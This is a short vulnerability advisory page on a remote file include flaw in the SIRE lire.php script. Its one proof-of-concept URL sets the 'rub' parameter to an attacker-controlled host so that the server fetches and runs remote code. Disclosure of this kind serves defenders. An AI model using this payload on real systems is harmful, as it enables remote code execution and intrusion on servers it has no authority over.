• info
• discussion
• exploit
• solution
• references

SIRE Lire.PHP Remote File Include Vulnerability


This issue can be exploited through a web client.

The following proof of concept is available:


http://www.example.com/lire.php?rub=http://[attacker]&cahier=1&art=1